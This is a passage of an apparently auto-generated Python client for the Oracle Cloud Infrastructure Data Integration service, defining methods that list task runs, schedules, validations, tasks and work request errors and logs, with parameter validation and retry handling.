Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_task_run_logs.py.html>`__ to see an example of how to use list_task_run_logs API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskRuns/{taskRunKey}/logs"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"page",
"limit",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_task_run_logs got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"taskRunKey": task_run_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[TaskRunLogSummary]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[TaskRunLogSummary]")
def list_task_runs(self, workspace_id, application_key, **kwargs):
"""
Retrieves a list of task runs and provides options to filter the list.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param list[str] key: (optional)
Used to filter by the key of the object.
:param str aggregator_key: (optional)
Used to filter by the project or the folder object.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param list[str] filter: (optional)
This filter parameter can be used to filter by model-specific queryable fields of the object. Example: `?filter=status eq Failed` returns all objects that have a status field with the value Failed.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskRunSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_task_runs.py.html>`__ to see an example of how to use list_task_runs API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskRuns"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"key",
"aggregator_key",
"fields",
"name",
"identifier",
"page",
"limit",
"sort_order",
"sort_by",
"filter"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_task_runs got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"key": self.base_client.generate_collection_format_param(kwargs.get("key", missing), 'multi'),
"aggregatorKey": kwargs.get("aggregator_key", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing),
"filter": self.base_client.generate_collection_format_param(kwargs.get("filter", missing), 'multi')
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="TaskRunSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="TaskRunSummaryCollection")
def list_task_schedules(self, workspace_id, application_key, **kwargs):
"""
Retrieves a list of all the TaskSchedule objects in the specified application.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param list[str] key: (optional)
Used to filter by the key of the object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the object.
:param list[str] type: (optional)
Used to filter by the object type of the object. It can be suffixed with an optional filter operator InSubtree. If this operator is not specified, then exact match is considered. Examples: `?type=DATA_LOADER_TASK&typeInSubtree=false`, `?type=DATA_LOADER_TASK`, and `?type=DATA_LOADER_TASK&typeInSubtree=true` each return all objects of type data loader task.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param bool is_enabled: (optional)
This filter parameter can be used to filter task schedules by their enabled state.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskScheduleSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_task_schedules.py.html>`__ to see an example of how to use list_task_schedules API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskSchedules"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"key",
"name",
"identifier",
"type",
"page",
"limit",
"sort_by",
"sort_order",
"opc_request_id",
"is_enabled"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_task_schedules got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"key": self.base_client.generate_collection_format_param(kwargs.get("key", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"type": self.base_client.generate_collection_format_param(kwargs.get("type", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing),
"isEnabled": kwargs.get("is_enabled", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="TaskScheduleSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="TaskScheduleSummaryCollection")
def list_task_validations(self, workspace_id, **kwargs):
"""
Retrieves a list of task validations within the specified workspace.
:param str workspace_id: (required)
The workspace ID.
:param str key: (optional)
Used to filter by the key of the object.
:param str name: (optional)
Used to filter by the name of the object.
:param str identifier: (optional)
Used to filter by the identifier of the object.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskValidationSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_task_validations.py.html>`__ to see an example of how to use list_task_validations API.
"""
resource_path = "/workspaces/{workspaceId}/taskValidations"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"key",
"name",
"identifier",
"fields",
"page",
"limit",
"sort_by",
"sort_order",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_task_validations got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"key": kwargs.get("key", missing),
"name": kwargs.get("name", missing),
"identifier": kwargs.get("identifier", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="TaskValidationSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="TaskValidationSummaryCollection")
def list_tasks(self, workspace_id, **kwargs):
"""
Retrieves a list of all tasks in a specified project or folder.
:param str workspace_id: (required)
The workspace ID.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str folder_id: (optional)
Unique key of the folder.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] key: (optional)
Used to filter by the key of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the object.
:param list[str] type: (optional)
Used to filter by the object type of the object. It can be suffixed with an optional filter operator InSubtree. If this operator is not specified, then exact match is considered. Examples: `?type=DATA_LOADER_TASK&typeInSubtree=false`, `?type=DATA_LOADER_TASK`, and `?type=DATA_LOADER_TASK&typeInSubtree=true` each return all objects of type data loader task.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_tasks.py.html>`__ to see an example of how to use list_tasks API.
"""
resource_path = "/workspaces/{workspaceId}/tasks"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"folder_id",
"fields",
"name",
"key",
"identifier",
"type",
"limit",
"page",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_tasks got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"folderId": kwargs.get("folder_id", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"key": self.base_client.generate_collection_format_param(kwargs.get("key", missing), 'multi'),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"type": self.base_client.generate_collection_format_param(kwargs.get("type", missing), 'multi'),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="TaskSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="TaskSummaryCollection")
def list_work_request_errors(self, work_request_id, **kwargs):
"""
Retrieves a paginated list of errors for a given work request.
:param str work_request_id: (required)
The ID of the asynchronous work request to retrieve.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.data_integration.models.WorkRequestError`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_work_request_errors.py.html>`__ to see an example of how to use list_work_request_errors API.
"""
resource_path = "/workRequests/{workRequestId}/workRequestErrors"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"page",
"limit",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_work_request_errors got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[WorkRequestError]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[WorkRequestError]")
def list_work_request_logs(self, work_request_id, **kwargs):
"""
Retrieves a paginated list of logs for a given work request.
:param str work_request_id: (required)
The ID of the asynchronous work request to retrieve.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.data_integration.models.WorkRequestLogEntry`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_work_request_logs.py.html>`__ to see an example of how to use list_work_request_logs API.
"""
resource_path = "/workRequests/{workRequestId}/logs"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"page",
"limit",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_work_request_logs got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[WorkRequestLogEntry]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[WorkRequestLogEntry]")
def list_work_requests(self, compartment_id, **kwargs):
"""
Lists the work requests in a compartment.
:param str compartment_id: (required)
The OCID of the compartment containing the resources you want to list.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str workspace_id: (optional)
The ID of the Data Integration Service (DIS) workspace.
:param str work_request_status: (optional)
The work request status.
Allowed values are: "ACCEPTED", "IN_PROGRESS", "FAILED", "SUCCEEDED", "CANCELING", "CANCELED"
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
